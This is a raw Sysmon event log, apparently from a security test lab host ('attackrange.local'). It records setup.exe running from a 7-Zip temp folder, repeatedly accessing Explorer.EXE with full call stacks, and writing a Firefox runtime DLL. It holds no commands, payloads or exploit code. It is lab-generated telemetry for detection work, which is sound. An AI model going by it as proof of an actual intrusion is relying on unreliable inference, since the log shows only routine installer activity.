13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014382Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014381Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014380Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014379Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014378Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014377Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014376Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\api-ms-win-crt-heap-l1-1-0.dll2021-01-18 13:59:52.177 10341000x800000000000000014375Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014374Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014373Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014372Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014371Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014370Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014369Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014368Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014367Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014366Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014365Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
